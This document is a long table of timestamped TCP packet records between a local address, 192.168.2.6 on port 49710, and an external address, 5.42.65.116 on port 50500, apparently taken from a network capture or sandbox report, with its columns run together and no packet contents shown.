                                May 24, 2024 00:22:00.875669956 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.881793022 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.881871939 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.890059948 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890105963 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890145063 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890182018 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890202999 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.890219927 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890252113 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.890259981 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.890352011 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.895215034 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.895344973 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.900042057 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900090933 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900125027 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.900130033 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900176048 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900218964 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900257111 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.900274992 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.900413036 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.904819012 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.904870987 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.904891968 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.904911995 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.904948950 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.904957056 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.905013084 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906302929 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906343937 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906380892 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906418085 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906440973 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906455994 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906480074 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906527996 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906534910 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906568050 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906594038 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906606913 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906646013 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906667948 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906685114 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906708956 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906723022 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906739950 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906760931 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906788111 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906800032 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906812906 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906838894 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906864882 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906878948 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906891108 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906917095 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906953096 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.906980038 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.906991005 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.907020092 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.907030106 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.907052040 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.907068968 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.907080889 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.907107115 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.907176971 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908188105 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908235073 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908261061 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908273935 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908288956 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908312082 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908329964 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908349991 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908366919 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908387899 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908418894 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908427954 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908449888 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908464909 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908478975 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908503056 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908521891 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908540964 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908559084 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908580065 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908596992 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908617973 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908638954 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908657074 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908668041 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908694983 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908726931 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908732891 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908755064 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908771992 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908792019 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908823013 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908834934 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908862114 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908885956 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908901930 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908915043 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908940077 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908962011 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.908978939 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.908991098 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.909020901 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.909046888 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.909079075 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.910113096 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.910160065 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.910243034 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913068056 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913109064 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913146973 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913183928 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913194895 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913223028 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913227081 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913249969 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913259983 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913270950 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913299084 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913326025 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913336992 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913352966 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913374901 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913388968 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913413048 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913435936 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913450956 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913461924 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913489103 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913512945 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913530111 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913541079 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913568020 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913599968 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913606882 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913628101 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913645983 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913664103 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913686991 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913718939 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913724899 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913743019 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913763046 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913789034 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913803101 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913840055 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.913866043 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.913923025 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915055990 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915102005 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915138960 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915174961 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915178061 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915210962 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915220022 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915242910 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915258884 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915297985 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915324926 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915337086 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915361881 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915374994 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915400028 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915412903 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915440083 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915451050 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915463924 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915489912 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915527105 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915558100 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915565968 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915596008 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915604115 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915621042 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915642023 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915656090 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915679932 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915699005 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915719032 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915741920 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915756941 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915767908 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915795088 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915816069 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915832996 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915852070 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.915872097 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.915888071 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917100906 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917145967 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917182922 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917207003 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917223930 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917239904 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917263031 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917273998 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917301893 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917320013 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917341948 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917363882 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917380095 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917393923 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917416096 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917442083 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917455912 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917494059 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917521000 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917534113 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917550087 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917572021 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917593956 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917608023 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917625904 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917646885 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917684078 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917711020 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917721987 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917746067 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917761087 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917776108 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917798996 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917823076 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917835951 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917851925 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917874098 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.917896032 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.917927027 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919076920 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919120073 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919152975 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919158936 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919193029 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919202089 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919238091 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919243097 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919265985 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919280052 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919294119 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919318914 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919354916 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919378996 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919394970 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919426918 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919435978 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919452906 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919473886 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919543028 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919800997 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919842005 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919879913 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919905901 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919920921 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919944048 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919959068 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.919975996 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.919997931 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920032978 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920057058 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920073032 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920094967 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920111895 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920139074 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920150995 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920164108 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920187950 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920226097 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920243979 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920264006 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920284033 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920303106 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920330048 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920341015 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920361042 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920378923 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920391083 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920418024 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920454979 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920485973 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920495987 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920521975 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920532942 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920552969 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920572042 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.920593977 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.920627117 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921323061 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921366930 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921405077 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921433926 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921447039 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921484947 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921545029 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921574116 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921585083 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921602011 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921623945 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921644926 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921663046 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921701908 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921722889 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921739101 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921758890 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921777964 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921804905 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921817064 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921829939 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921854973 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921876907 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921892881 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921930075 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921957970 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.921969891 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.921993017 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922008038 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922025919 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922045946 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922084093 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922106981 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922118902 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922142982 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922157049 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922183037 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922195911 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922234058 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922261953 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922811985 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922856092 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922894955 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922923088 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922934055 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922955036 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.922971964 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.922992945 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923012018 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923048973 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923068047 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923086882 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923108101 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923125982 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923136950 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923166037 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923202991 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923228025 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923243046 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923260927 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923280954 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923304081 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923321009 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923341990 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923361063 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923376083 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923398018 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923434973 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923464060 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923472881 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923501015 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923511982 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.923530102 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.923552990 CEST50500497105.42.65.116192.168.2.6
